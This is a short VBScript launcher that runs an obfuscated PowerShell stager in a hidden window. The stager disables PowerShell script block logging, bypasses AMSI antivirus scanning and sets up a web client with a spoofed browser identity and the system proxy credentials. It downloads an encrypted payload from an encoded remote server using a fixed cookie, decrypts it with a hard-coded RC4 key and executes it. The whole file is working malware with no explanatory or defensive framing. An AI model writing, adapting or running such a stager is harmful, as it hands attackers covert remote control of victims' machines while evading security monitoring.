Dim objShellSet objShell = WScript.CreateObject("WScript.Shell")command = "P

1. Dim objShell
2. Set objShell = WScript.CreateObject("WScript.Shell")
3. command = "POWErsHEll  -NOpRO  -WInDOw 1 -execUT  bYpasS -nOE  -nONINTeRAcTIve   "+Chr(34)+"${Q`3c} =  [tyPe](\"+Chr(34)+"{1}{2}{4}{5}{8}{9}{0}{6}{7}{3}\"+Chr(34)+" -f 'S','cOLleCT','i','jECt','Ons.GEneRIc.dicTi','O','ySTe','M.OB','naRy[','string,') ;  .(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f 'Item','sEt-')  (\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+"-f'vAR','BF','IABle:qs')  ([TypE](\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+" -f'K','CrIPTbloc','s') );    .(\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+" -f'S','tem','ET-I')  ('vari'+'aBlE:'+'I46'+'9')  ( [TyPE](\"+Chr(34)+"{0}{1}\"+Chr(34)+" -F 'R','ef') ) ;  &(\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f'sEt-iTE','m') (\"+Chr(34)+"{2}{3}{0}{1}\"+Chr(34)+" -f ':ZSN','je','VaRI','ABLE') ( [Type](\"+Chr(34)+"{5}{6}{1}{8}{3}{2}{4}{7}{0}\"+Chr(34)+"-F 'Er','nE','ERvI','s','cePOinTmaN','syste','m.','ag','t.')  ); ${D4`8H1y} =  [tYpE](\"+Chr(34)+"{3}{2}{5}{1}{4}{0}\"+Chr(34)+" -F 't','.weBreqU','tE','sys','ES','m.net'); &(\"+Chr(34)+"{1}{2}{0}\"+Chr(34)+"-f 'iTem','S','et-')  (\"+Chr(34)+"vAriA\"+Chr(34)+"+\"+Chr(34)+"b\"+Chr(34)+"+\"+Chr(34)+"LE:7\"+Chr(34)+"+\"+Chr(34)+"3E4\"+Chr(34)+")  ( [TYpE](\"+Chr(34)+"{4}{1}{2}{3}{0}{5}\"+Chr(34)+" -F'e','ySTem.NeT','.c','RED','s','ntIaLcACHE') ) ;  .(\"+Chr(34)+"{1}{2}{0}\"+Chr(34)+" -f 'Em','Se','t-it') (\"+Chr(34)+"{3}{0}{2}{1}\"+Chr(34)+" -f 'E:','m6WN','2','variABl')  ( [tYPE](\"+Chr(34)+"{0}{4}{1}{2}{3}\"+Chr(34)+"-F 'sY','tEm.TeXt.ENCO','d','Ing','S')  ); .(\"+Chr(34)+"{1}{0}{2}{3}\"+Chr(34)+"-f 'VaR','sET-','iAB','LE') ('P2F'+'r') (  [tYpe](\"+Chr(34)+"{3}{0}{2}{1}\"+Chr(34)+"-F'Xt','nCodIng','.E','te') ) ; ${LN`W6} =[tYPe](\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+" -f 'c','VERT','ON')  ;IF(${pSV`e`RSiON`TAB`le}.\"+Chr(34)+"P`sVeRS`ION\"+Chr(34)+".\"+Chr(34)+"M`Ajor\"+Chr(34)+" -Ge 3){${7`Cd}= (&(\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f 'vaR','IABle')  (\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f 'I46','9') -va  ).\"+Chr(34)+"a`SseMB`Ly\"+Chr(34)+".(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f 'TTyp','GE','e').Invoke((\"+Chr(34)+"{6}{3}{7}{0}{5}{1}{8}{2}{4}\"+Chr(34)+" -f 'gem','.A','tomation.','em.Man','Utils','ent','Syst','a','u')).\"+Chr(34)+"GeTFiE`LD\"+Chr(34)+"((\"+Chr(34)+"{1}{4}{5}{3}{2}{0}\"+Chr(34)+"-f'Settings','cachedGro','y','c','upP','oli'),'N'+(\"+Chr(34)+"{3}{2}{1}{0}\"+Chr(34)+"-f'lic,Static','b','Pu','on'));IF(${7`cd}){${2`35}=${7`CD}.(\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f'GEtV','AluE').Invoke(${nu`lL});IF(${2`35}[(\"+Chr(34)+"{2}{0}{1}\"+Chr(34)+" -f'i','ptB','Scr')+(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f 'kL','loc','ogging')]){${2`35}[(\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f 'S','criptB')+(\"+Chr(34)+"{1}{3}{2}{0}\"+Chr(34)+"-f 'ing','l','Logg','ock')][(\"+Chr(34)+"{1}{3}{2}{0}{4}\"+Chr(34)+" -f 'eScrip','E','abl','n','tB')+(\"+Chr(34)+"{0}{1}{3}{2}\"+Chr(34)+"-f'lockLo','g','ing','g')]=0;${2`35}[(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f'ri','Sc','ptB')+(\"+Chr(34)+"{2}{0}{1}\"+Chr(34)+" -f'o','gging','lockL')][(\"+Chr(34)+"{3}{6}{5}{0}{4}{1}{2}{7}\"+Chr(34)+" -f'criptB','ti','onLoggin','Enab','lockInvoca','S','le','g')]=0}${v`AL}= (.(\"+Chr(34)+"{1}{0}\"+Chr(34)+"-f 'eM','IT') (\"+Chr(34)+"{1}{3}{0}{2}\"+Chr(34)+"-f'BLe:q','VA','3c','rIa')  ).\"+Chr(34)+"va`lUe\"+Chr(34)+"::(\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f 'N','eW').Invoke();${V`Al}.(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'dd','A').Invoke((\"+Chr(34)+"{2}{3}{1}{0}\"+Chr(34)+" -f 'tB','rip','EnableS','c')+(\"+Chr(34)+"{3}{1}{2}{0}\"+Chr(34)+"-f'g','og','gin','lockL'),0);${V`Al}.(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'D','Ad').Invoke((\"+Chr(34)+"{0}{4}{2}{7}{5}{6}{1}{3}\"+Chr(34)+"-f'EnableS','nLoggi','r','ng','c','kIn','vocatio','iptBloc'),0);${2`35}[(((\"+Chr(34)+"{7}{5}{11}{4}{2}{14}{8}{3}{13}{0}{9}{6}{16}{15}{10}{1}{12}\"+Chr(34)+" -f 'ndo','cri','oftware','licie','NEvFTS','_','werShel','HKEY','FTPo','wsvFTPo','TS','LOCAL_MACHI','ptB','svFTMicrosoftvFTWi','v','F','lv')).\"+Chr(34)+"rEP`l`Ace\"+Chr(34)+"('vFT',[STRIng][CHaR]92))+(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f 'c','lo','kLogging')]=${v`AL}}ELse{  (&(\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+" -f'aRIABLe','V','gEt-')  (\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'F','qsb') -vALUeonlY ).\"+Chr(34)+"GetFIe`ld\"+Chr(34)+"((\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+" -f'si','tures','gna'),'N'+(\"+Chr(34)+"{2}{1}{3}{0}\"+Chr(34)+" -f'c','Public,Sta','on','ti')).\"+Chr(34)+"Se`TV`ALue\"+Chr(34)+"(${NU`LL},(.(\"+Chr(34)+"{1}{2}{3}{0}\"+Chr(34)+"-f'eCT','NeW-','O','bJ') (\"+Chr(34)+"{1}{8}{3}{0}{9}{2}{5}{7}{4}{6}\"+Chr(34)+" -f 's','CoL','.H','Tion','RIng','AshSet[',']','sT','Lec','.GeNeRIC')))}${R`eF}=  ${I4`69}.\"+Chr(34)+"A`Ss`EmBlY\"+Chr(34)+".(\"+Chr(34)+"{2}{0}{1}\"+Chr(34)+" -f'TyP','e','GEt').Invoke((\"+Chr(34)+"{3}{0}{6}{1}{7}{10}{9}{2}{5}{4}{8}\"+Chr(34)+" -f'ystem.M','e','mation','S','ti','.AmsiU','anagem','nt.','ls','uto','A'));${R`ef}.(\"+Chr(34)+"{0}{1}{2}\"+Chr(34)+"-f'GEtFIE','l','d').Invoke((\"+Chr(34)+"{0}{1}{3}{2}\"+Chr(34)+" -f 'amsiIn','it','led','Fai'),(\"+Chr(34)+"{1}{0}{2}{4}{3}\"+Chr(34)+" -f'nPublic,','No','St','c','ati')).(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f'AlU','SeTV','e').Invoke(${NU`lL},${T`RuE});}; ${zsn`je}::\"+Chr(34)+"eX`PECt100CoNtI`N`Ue\"+Chr(34)+"=0;${2`A1}=.(\"+Chr(34)+"{0}{1}{2}\"+Chr(34)+" -f'New-','O','bjECt') (\"+Chr(34)+"{0}{3}{2}{1}\"+Chr(34)+"-f'SySt','nT','NEt.WEBClIE','eM.');${U}=((\"+Chr(34)+"{13}{14}{5}{10}{2}{7}{6}{8}{9}{4}{0}{12}{1}{3}{11}\"+Chr(34)+"-f 'nt/7','rv:11',' 6.1; W','.0) like Ge','ide',' ','4;','OW6',' ','Tr','(Windows NT','cko','.0; ','Mo','zilla/5.0'));${2`A1}.\"+Chr(34)+"hEAD`eRS\"+Chr(34)+".(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'D','Ad').Invoke((\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+"-f'ent','Ag','User-'),${U});${2`A1}.\"+Chr(34)+"HE`AD`ers\"+Chr(34)+".(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'D','Ad').Invoke((\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+" -f'nt','ge','User-A'),${u});${2`A1}.\"+Chr(34)+"p`ROxY\"+Chr(34)+"=  ( &('Ls')  (\"+Chr(34)+"Va\"+Chr(34)+"+\"+Chr(34)+"ria\"+Chr(34)+"+\"+Chr(34)+"Bl\"+Chr(34)+"+\"+Chr(34)+"E:D4\"+Chr(34)+"+\"+Chr(34)+"8H1Y\"+Chr(34)+") ).\"+Chr(34)+"VAl`Ue\"+Chr(34)+"::\"+Chr(34)+"d`EFau`LT`w`eBPrOXY\"+Chr(34)+";${2`A1}.\"+Chr(34)+"pro`xy\"+Chr(34)+".\"+Chr(34)+"creDe`NTIA`lS\"+Chr(34)+" =   ${7`3e4}::\"+Chr(34)+"defaUltnet`WorKCReD`EN`T`i`AlS\"+Chr(34)+";${s`crI`PT:`P`RoxY} = ${2`A1}.\"+Chr(34)+"p`ROXY\"+Chr(34)+";${K}= (.(\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f 'V','ariabLe') (\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f '2M','6Wn')).\"+Chr(34)+"VA`LuE\"+Chr(34)+"::\"+Chr(34)+"A`scII\"+Chr(34)+".(\"+Chr(34)+"{1}{2}{0}\"+Chr(34)+" -f'tEs','G','eTBY').Invoke((\"+Chr(34)+"{6}{3}{0}{7}{1}{4}{5}{2}\"+Chr(34)+"-f 'f','9f3f75','25','f23','175793649','115c1b','2','a357'));${r}={${D},${k}=${Ar`GS};${s}=0..255;0..255|.('%'){${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.\"+Chr(34)+"Cou`NT\"+Chr(34)+"])%256;${S}[${_}],${s}[${J}]=${S}[${j}],${s}[${_}]};${d}|&('%'){${I}=(${I}+1)%256;${h}=(${H}+${s}[${i}])%256;${s}[${i}],${S}[${h}]=${s}[${h}],${S}[${I}];${_}-BXOR${S}[(${S}[${I}]+${S}[${H}])%256]}};${S`er}=$(  ${P`2FR}::\"+Chr(34)+"UniC`oDe\"+Chr(34)+".\"+Chr(34)+"g`etSt`Ri`Ng\"+Chr(34)+"(  ${Ln`w6}::(\"+Chr(34)+"{0}{3}{1}{2}\"+Chr(34)+"-f 'FromBASe6','StR','iNG','4').Invoke((\"+Chr(34)+"{7}{14}{12}{2}{3}{6}{15}{9}{13}{17}{1}{4}{10}{8}{16}{0}{5}{18}{11}\"+Chr(34)+" -f 'xA','MgAyA','6A','C8ALwAxADM','D','DIANg','ANw','aAB0A','AL','ADEAMQA','k','gAMAAwAA==','AcAA','3AC','HQ','Au','gA','4A','A6AD'))));${T}=(\"+Chr(34)+"{4}{3}{1}{0}{2}\"+Chr(34)+" -f '.','ess','php','proc','/login/');${2`A1}.\"+Chr(34)+"H`eaDE`Rs\"+Chr(34)+".(\"+Chr(34)+"{1}{0}\"+Chr(34)+"-f 'D','Ad').Invoke((\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f 'Co','okie'),(\"+Chr(34)+"{3}{0}{5}{6}{7}{1}{2}{4}\"+Chr(34)+" -f'D','0','+fzJ4ODBSCN','ZrshYEslfzwPMu','l0=','=xPdK','3Mt','HUCXtw'));${D`Ata}=${2`A1}.(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+" -f'OwN','D','LOADData').Invoke(${S`ER}+${T});${iV}=${DA`TA}[0..3];${D`Ata}=${Da`TA}[4..${d`ATA}.\"+Chr(34)+"l`eNgtH\"+Chr(34)+"];-joIn[ChAr[]](& ${R} ${d`ATA} (${iV}+${K}))|&(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f 'EX','I')"+Chr(34)+""
4. objShell.Run command,0
5. Set objShell = Nothing